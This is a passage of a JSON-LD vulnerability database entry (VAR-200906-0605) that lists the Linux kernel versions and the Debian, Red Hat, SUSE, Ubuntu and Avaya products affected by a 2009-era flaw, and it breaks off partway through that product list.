{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200906-0605",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.8,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0 (x86-64)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.7 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.7 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.2.z (server)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.3.z (server)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.4.z (server)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel .0-test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.35.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34.5"
      },
      {
        "model": "linux enterprise server unsupported extras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "linux enterprise sp2 debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel .0-test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.2"
      },
      {
        "model": "kernel .0-test12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel .0-test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.7"
      },
      {
        "model": "kernel -rc6-git6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel .0-test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.7"
      },
      {
        "model": "linux enterprise sp3 debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "meeting exchange sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0.0.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.4"
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18x86"
      },
      {
        "model": "linux enterprise sdk sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel 2.6.24-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel pre-3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux mandrake x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2010.0"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.5"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel pre-5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34.3"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.1"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "intuity audix lx sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "enterprise linux desktop version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -ow2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.8"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.371"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel pre-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "messaging storage server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "linux mips",
        "scope": "eq",
